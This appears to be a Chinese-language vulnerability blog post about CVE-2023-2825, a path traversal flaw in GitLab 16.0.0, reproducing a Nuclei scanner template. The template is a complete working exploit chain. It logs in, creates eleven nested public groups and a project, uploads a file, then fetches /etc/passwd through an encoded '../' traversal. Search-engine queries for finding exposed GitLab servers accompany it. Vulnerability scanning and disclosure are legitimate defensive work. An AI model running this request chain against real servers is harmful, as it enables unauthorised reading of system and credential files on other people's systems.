GitLab 路径遍历漏洞

漏洞信息

漏洞名称: GitLab 路径遍历漏洞

漏洞编号:

  • CVE: CVE-2023-2825

漏洞类型: 目录遍历

漏洞等级: 高危

漏洞描述: GitLab是一个广泛使用的开源代码托管和协作平台,支持团队在软件开发过程中进行版本控制、代码审查和持续集成/持续部署(CI/CD)。它被广泛应用于企业级服务中,作为软件开发的生命周期管理工具。此次发现的漏洞影响GitLab社区版和企业版的16.0.0版本。该漏洞属于目录遍历类型,技术根源在于GitLab在处理公共项目中嵌套至少五个组的附件时,未能正确验证和限制文件路径的访问,导致攻击者可以构造特殊的请求路径,绕过安全限制,读取服务器上的任意文件。这种漏洞的利用不需要认证,攻击者可以远程利用此漏洞,获取敏感信息如系统配置文件、用户凭证等,对系统安全构成严重威胁。由于GitLab的广泛使用,此漏洞的影响范围较大,建议用户立即升级到不受影响的版本以修复此安全问题。

产品厂商: gitlab

产品名称: GitLab

影响版本: 16.0.0

搜索语法: title=”gitlab”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/b7c60754265d41e02af8d5ea7c8a40acba9a6233/http%2Fcves%2F2023%2FCVE-2023-2825.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220

id: CVE-2023-2825

info:
  name: GitLab 16.0.0 - Path Traversal
  author: DhiyaneshDk,rootxharsh,iamnoooob,pdresearch
  severity: high
  description: |
    An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups
  remediation: |
    Upgrade GitLab to a version that is not affected by the path traversal vulnerability (CVE-2023-2825).
  reference:
    - https://about.gitlab.com/releases/2023/05/23/critical-security-release-gitlab-16-0-1-released/
    - https://github.com/Occamsec/CVE-2023-2825
    - https://labs.watchtowr.com/gitlab-arbitrary-file-read-gitlab-cve-2023-2825-analysis/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2825
    - https://gitlab.com/gitlab-org/cves/-/blob/master/2023/CVE-2023-2825.json
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-2825
    cwe-id: CWE-22
    epss-score: 0.93393
    epss-percentile: 0.99809
    cpe: cpe:2.3:a:gitlab:gitlab:16.0.0:*:*:*:community:*:*:*
  metadata:
    verified: true
    max-request: 16
    vendor: gitlab
    product: gitlab
    shodan-query:
      - title:"Gitlab"
      - cpe:"cpe:2.3:a:gitlab:gitlab"
      - http.title:"gitlab"
    fofa-query: title="gitlab"
    google-query: intitle:"gitlab"
  tags: cve2023,cve,gitlab,lfi,authenticated,intrusive
variables:
  data: "{{rand_base(5)}}"

http:
  - raw:
      - |
        GET /users/sign_in HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /users/sign_in HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept: */*

        user%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&authenticity_token={{token_1}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept: */*

        group%5Bparent_id%5D=&group%5Bname%5D={{data}}-1&group%5Bpath%5D={{data}}-1&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-2&group%5Bpath%5D={{data}}-2&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-3&group%5Bpath%5D={{data}}-3&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-4&group%5Bpath%5D={{data}}-4&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-5&group%5Bpath%5D={{data}}-5&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-6&group%5Bpath%5D={{data}}-6&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-7&group%5Bpath%5D={{data}}-7&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-8&group%5Bpath%5D={{data}}-8&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-9&group%5Bpath%5D={{data}}-9&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-10&group%5Bpath%5D={{data}}-10&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        POST /groups HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-11&group%5Bpath%5D={{data}}-11&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
      - |
        @timeout: 15s
        POST /projects HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        project%5Bci_cd_only%5D=false&project%5Bname%5D=CVE-2023-2825&project%5Bselected_namespace_id%5D={{namespace_id}}&project%5Bnamespace_id%5D={{namespace_id}}&project%5Bpath%5D=CVE-2023-2825&project%5Bvisibility_level%5D=20&project%5Binitialize_with_readme=1&authenticity_token={{token_2}}
      - |
        POST /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        X-CSRF-Token: {{x-csrf-token}}
        Content-Type: multipart/form-data; boundary=0ce2a9fbe06b6da89c138a35a1765ed6

        --0ce2a9fbe06b6da89c138a35a1765ed6
        Content-Disposition: form-data; name="file"; filename="{{randstr}}"

        {{randstr}}
        --0ce2a9fbe06b6da89c138a35a1765ed6--
      - |
        GET /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads/{{upload-hash}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    host-redirects: true

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 726f6f743a78
        encoding: hex

      - type: word
        part: header
        words:
          - application/octet-stream
          - etc%2Fpasswd
        condition: and

    extractors:
      - type: regex
        name: token_1
        group: 1
        regex:
          - name="authenticity_token" value="([A-Za-z0-9_-]+)"
        internal: true
        part: body

      - type: regex
        name: token_2
        group: 1
        regex:
          - name="csrf\-token" content="([A-Z_0-9a-z-]+)"
        internal: true
        part: body

      - type: regex
        name: parent_id
        group: 1
        regex:
          - href="\/groups\/new\?parent_id=([0-9]+)
        internal: true
        part: body

      - type: regex
        name: namespace_id
        group: 1
        regex:
          - ref="\/projects\/new\?namespace_id=([0-9]+)
        internal: true
        part: body

      - type: regex
        name: x-csrf-token
        group: 1
        regex:
          - const headers = \{"X\-CSRF\-Token":"([a-zA-Z-0-9_]+)"
        internal: true
        part: body

      - type: regex
        name: upload-hash
        group: 1
        regex:
          - '"url":"\/uploads\/([0-9a-z]+)\/'
        internal: true
        part: body
# digest: 4a0a00473045022100c3a0188143213dfd2f20284c15140a18d349b3ef0068d203081023388a6dce6e022028a3158b1dc6ed2772340bbd48004786e236e32513f588699f2ab5b3e0aea750:922c64590222798bb761d5b6d8e72950

Github Poc
#projectdiscovery/nuclei-templates:github issues #目录遍历
GitLab 路径遍历漏洞
http://example.com/2025/07/21/github_2426684373/
作者
lianccc
发布于
2025年7月21日
许可协议